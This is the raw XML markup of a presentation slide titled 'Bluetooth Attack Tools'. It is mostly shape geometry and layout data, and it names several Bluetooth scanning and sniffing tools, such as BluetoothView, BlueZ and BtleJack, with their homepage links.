            <a:gdLst>
              <a:gd name="T0" fmla="*/ 444 w 445"/>
              <a:gd name="T1" fmla="*/ 0 h 570"/>
              <a:gd name="T2" fmla="*/ 0 w 445"/>
              <a:gd name="T3" fmla="*/ 569 h 570"/>
              <a:gd name="T4" fmla="*/ 0 w 445"/>
              <a:gd name="T5" fmla="*/ 0 h 570"/>
              <a:gd name="T6" fmla="*/ 444 w 445"/>
              <a:gd name="T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45" h="570">
                <a:moveTo>
                  <a:pt x="444" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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217"/>
            <a:endParaRPr lang="en-US" sz="270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7" name="Freeform 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD697517-1680-46DD-B7D2-A927C629C7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3207" y="1952475"/>
            <a:ext cx="192012" cy="247696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 439"/>
              <a:gd name="T1" fmla="*/ 0 h 570"/>
              <a:gd name="T2" fmla="*/ 438 w 439"/>
              <a:gd name="T3" fmla="*/ 569 h 570"/>
              <a:gd name="T4" fmla="*/ 438 w 439"/>
              <a:gd name="T5" fmla="*/ 0 h 570"/>
              <a:gd name="T6" fmla="*/ 0 w 439"/>
              <a:gd name="T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9" h="570">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="438" y="569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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217"/>
            <a:endParaRPr lang="en-US" sz="3599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7A944EA-3028-4317-9C8D-A2AF4B863C8F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141413" y="158750"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Bluetooth Attack Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504301" y="1100479"/>
            <a:ext cx="1833643" cy="3693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BluetoothView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6F9009B5-C9B0-4D80-AE8D-1A9D796B55B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8435" y="2350008"/>
            <a:ext cx="6558096" cy="3960000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31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D6B7415-BB10-4F99-8C8A-9C8693DF1C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450799" y="1132262"/>
            <a:ext cx="7822426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monitors the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activity of Bluetooth devices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around you and displays information, such as Device Name, Bluetooth Address, Major Device Type, Minor Device Type, First Detection Time, and Last Detection Time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28D362B2-12B5-41BB-B55E-9A30F000696A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783405" y="6335941"/>
            <a:ext cx="1428597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https://www.nirsoft.net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6213C632-034C-4432-BB74-3B474E8A9A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848409" y="4196090"/>
            <a:ext cx="2285626" cy="52322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BTCrawler</a:t>
            </a:r>
            <a:b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</a:b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http://petronius.sourceforge.net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D4AD3667-492F-4CD7-B4AA-902A44FC9CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848409" y="5044529"/>
            <a:ext cx="3006546" cy="523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BlueScan</a:t>
            </a:r>
            <a:b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</a:b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http://bluescanner.sourceforge.net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8D8745E8-728E-46E2-925B-0C50046A640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848409" y="5892969"/>
            <a:ext cx="2932114" cy="523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Bluetooth Scanner - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1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btCrawler</a:t>
            </a:r>
            <a:b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</a:b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https://play.google.com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12302011-90D3-404B-9F55-231228281101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848409" y="2499212"/>
            <a:ext cx="2282921" cy="523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BlueZ</a:t>
            </a:r>
            <a:b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</a:b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http://www.bluez.org</a:t>
            </a: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665D2BC9-1E87-4B08-A0E9-127A03A51018}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848409" y="3347651"/>
            <a:ext cx="2707035" cy="523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BtleJack</a:t>
            </a:r>
            <a:b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</a:b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https://github.com</a:t>
            </a:r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198592BB-8F1C-4A73-B32B-6F5D608C036D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249459" y="5057978"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG" dirty="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DCAC4533-2771-41D3-8915-C0766A9DBCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249459" y="5906716"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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FF30DB44-8877-4354-83F6-5F85CCB0FB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249459" y="4222035"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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1A73A7D3-9A14-480E-9722-664DDAC31322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249459" y="2553036"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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9B8D0DC0-8627-4950-995B-317E57DBDFB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249459" y="3397442"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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58" name="Freeform 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754D0EA3-0243-44F6-8731-C39FD382C7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01760" y="2649582"/>
            <a:ext cx="219727" cy="298660"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 47616 w 364"/>
              <a:gd name="T1" fmla="*/ 213771 h 498"/>
              <a:gd name="T2" fmla="*/ 47616 w 364"/>
              <a:gd name="T3" fmla="*/ 213771 h 498"/>
              <a:gd name="T4" fmla="*/ 79061 w 364"/>
              <a:gd name="T5" fmla="*/ 221804 h 498"/>
              <a:gd name="T6" fmla="*/ 111404 w 364"/>
              <a:gd name="T7" fmla="*/ 213771 h 498"/>
              <a:gd name="T8" fmla="*/ 111404 w 364"/>
              <a:gd name="T9" fmla="*/ 190117 h 498"/>
              <a:gd name="T10" fmla="*/ 47616 w 364"/>
              <a:gd name="T11" fmla="*/ 190117 h 498"/>
              <a:gd name="T12" fmla="*/ 47616 w 364"/>
              <a:gd name="T13" fmla="*/ 213771 h 498"/>
              <a:gd name="T14" fmla="*/ 111404 w 364"/>
              <a:gd name="T15" fmla="*/ 178514 h 498"/>
              <a:gd name="T16" fmla="*/ 111404 w 364"/>
              <a:gd name="T17" fmla="*/ 178514 h 498"/>
              <a:gd name="T18" fmla="*/ 159020 w 364"/>
              <a:gd name="T19" fmla="*/ 67389 h 498"/>
              <a:gd name="T20" fmla="*/ 79061 w 364"/>
              <a:gd name="T21" fmla="*/ 0 h 498"/>
              <a:gd name="T22" fmla="*/ 0 w 364"/>
              <a:gd name="T23" fmla="*/ 67389 h 498"/>
              <a:gd name="T24" fmla="*/ 47616 w 364"/>
              <a:gd name="T25" fmla="*/ 178514 h 498"/>
              <a:gd name="T26" fmla="*/ 111404 w 364"/>
              <a:gd name="T27" fmla="*/ 178514 h 498"/>
              <a:gd name="T28" fmla="*/ 23808 w 364"/>
              <a:gd name="T29" fmla="*/ 67389 h 498"/>
              <a:gd name="T30" fmla="*/ 23808 w 364"/>
              <a:gd name="T31" fmla="*/ 67389 h 498"/>
              <a:gd name="T32" fmla="*/ 79061 w 364"/>
              <a:gd name="T33" fmla="*/ 23653 h 498"/>
              <a:gd name="T34" fmla="*/ 135212 w 364"/>
              <a:gd name="T35" fmla="*/ 67389 h 498"/>
              <a:gd name="T36" fmla="*/ 115447 w 364"/>
              <a:gd name="T37" fmla="*/ 111125 h 498"/>
              <a:gd name="T38" fmla="*/ 87147 w 364"/>
              <a:gd name="T39" fmla="*/ 158431 h 498"/>
              <a:gd name="T40" fmla="*/ 71424 w 364"/>
              <a:gd name="T41" fmla="*/ 158431 h 498"/>
              <a:gd name="T42" fmla="*/ 43573 w 364"/>
              <a:gd name="T43" fmla="*/ 111125 h 498"/>
              <a:gd name="T44" fmla="*/ 23808 w 364"/>
              <a:gd name="T45" fmla="*/ 67389 h 498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364" h="498">
                <a:moveTo>
                  <a:pt x="106" y="479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="106" y="479"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="488"/>
                  <a:pt x="150" y="497"/>
                  <a:pt x="176" y="497"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203" y="497"/>
                  <a:pt x="229" y="488"/>
                  <a:pt x="248" y="479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="426"/>
                  <a:pt x="248" y="426"/>
                  <a:pt x="248" y="426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="426"/>
                  <a:pt x="106" y="426"/>
                  <a:pt x="106" y="426"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="106" y="479"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="248" y="400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="248" y="400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="293"/>
                  <a:pt x="363" y="258"/>
                  <a:pt x="354" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="345" y="80"/>
                  <a:pt x="301" y="0"/>
                  <a:pt x="176" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="0"/>
                  <a:pt x="9" y="80"/>
                  <a:pt x="0" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="258"/>
                  <a:pt x="106" y="293"/>
                  <a:pt x="106" y="400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="248" y="400"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="53" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="53" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="89"/>
                  <a:pt x="106" y="53"/>
                  <a:pt x="176" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="53"/>
                  <a:pt x="292" y="89"/>
                  <a:pt x="301" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="187"/>
                  <a:pt x="283" y="213"/>
                  <a:pt x="257" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="275"/>
                  <a:pt x="213" y="311"/>
                  <a:pt x="194" y="355"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="355"/>
                  <a:pt x="159" y="355"/>
                  <a:pt x="159" y="355"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141" y="311"/>
                  <a:pt x="123" y="275"/>
                  <a:pt x="97" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="213"/>
                  <a:pt x="53" y="187"/>
                  <a:pt x="53" y="1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lIns="34290" tIns="17145" rIns="34290" bIns="17145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59" name="Freeform 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C39AC2D1-3DBD-4AA1-9A62-73062FEDF1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5529" y="3521480"/>
            <a:ext cx="300794" cy="262393"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 199067 w 497"/>
              <a:gd name="T1" fmla="*/ 0 h 435"/>
              <a:gd name="T2" fmla="*/ 199067 w 497"/>
              <a:gd name="T3" fmla="*/ 0 h 435"/>
              <a:gd name="T4" fmla="*/ 23870 w 497"/>
              <a:gd name="T5" fmla="*/ 0 h 435"/>
              <a:gd name="T6" fmla="*/ 0 w 497"/>
              <a:gd name="T7" fmla="*/ 19751 h 435"/>
              <a:gd name="T8" fmla="*/ 0 w 497"/>
              <a:gd name="T9" fmla="*/ 143192 h 435"/>
              <a:gd name="T10" fmla="*/ 19817 w 497"/>
              <a:gd name="T11" fmla="*/ 171023 h 435"/>
              <a:gd name="T12" fmla="*/ 72061 w 497"/>
              <a:gd name="T13" fmla="*/ 179102 h 435"/>
              <a:gd name="T14" fmla="*/ 55397 w 497"/>
              <a:gd name="T15" fmla="*/ 194813 h 435"/>
              <a:gd name="T16" fmla="*/ 167541 w 497"/>
              <a:gd name="T17" fmla="*/ 194813 h 435"/>
              <a:gd name="T18" fmla="*/ 151327 w 497"/>
              <a:gd name="T19" fmla="*/ 179102 h 435"/>
              <a:gd name="T20" fmla="*/ 203121 w 497"/>
              <a:gd name="T21" fmla="*/ 171023 h 435"/>
              <a:gd name="T22" fmla="*/ 223388 w 497"/>
              <a:gd name="T23" fmla="*/ 143192 h 435"/>
              <a:gd name="T24" fmla="*/ 223388 w 497"/>
              <a:gd name="T25" fmla="*/ 19751 h 435"/>
              <a:gd name="T26" fmla="*/ 199067 w 497"/>
              <a:gd name="T27" fmla="*/ 0 h 435"/>
              <a:gd name="T28" fmla="*/ 199067 w 497"/>
              <a:gd name="T29" fmla="*/ 143192 h 435"/>
              <a:gd name="T30" fmla="*/ 199067 w 497"/>
              <a:gd name="T31" fmla="*/ 143192 h 435"/>
              <a:gd name="T32" fmla="*/ 23870 w 497"/>
              <a:gd name="T33" fmla="*/ 143192 h 435"/>
              <a:gd name="T34" fmla="*/ 23870 w 497"/>
              <a:gd name="T35" fmla="*/ 19751 h 435"/>
              <a:gd name="T36" fmla="*/ 199067 w 497"/>
              <a:gd name="T37" fmla="*/ 19751 h 435"/>
              <a:gd name="T38" fmla="*/ 199067 w 497"/>
              <a:gd name="T39" fmla="*/ 143192 h 435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97" h="435">
                <a:moveTo>
                  <a:pt x="442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="442" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="0"/>
                  <a:pt x="53" y="0"/>
                  <a:pt x="53" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="0"/>
                  <a:pt x="0" y="17"/>
                  <a:pt x="0" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="319"/>
                  <a:pt x="0" y="319"/>
                  <a:pt x="0" y="319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="345"/>
                  <a:pt x="17" y="372"/>
                  <a:pt x="44" y="381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="399"/>
                  <a:pt x="160" y="399"/>
                  <a:pt x="160" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="399"/>
                  <a:pt x="62" y="434"/>
                  <a:pt x="123" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="434"/>
                  <a:pt x="372" y="434"/>
                  <a:pt x="372" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="434" y="434"/>
                  <a:pt x="336" y="399"/>
                  <a:pt x="336" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="451" y="381"/>
                  <a:pt x="451" y="381"/>
                  <a:pt x="451" y="381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="372"/>
                  <a:pt x="496" y="345"/>
                  <a:pt x="496" y="319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="496" y="44"/>
                  <a:pt x="496" y="44"/>
                  <a:pt x="496" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="496" y="17"/>
                  <a:pt x="470" y="0"/>
                  <a:pt x="442" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="442" y="319"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="442" y="319"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="319"/>
                  <a:pt x="53" y="319"/>
                  <a:pt x="53" y="319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="44"/>
                  <a:pt x="53" y="44"/>
                  <a:pt x="53" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="442" y="44"/>
                  <a:pt x="442" y="44"/>
                  <a:pt x="442" y="44"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="442" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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60" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2884C066-205B-4854-83B8-8C953CBD6E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70287" y="4333776"/>
            <a:ext cx="277327" cy="273060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
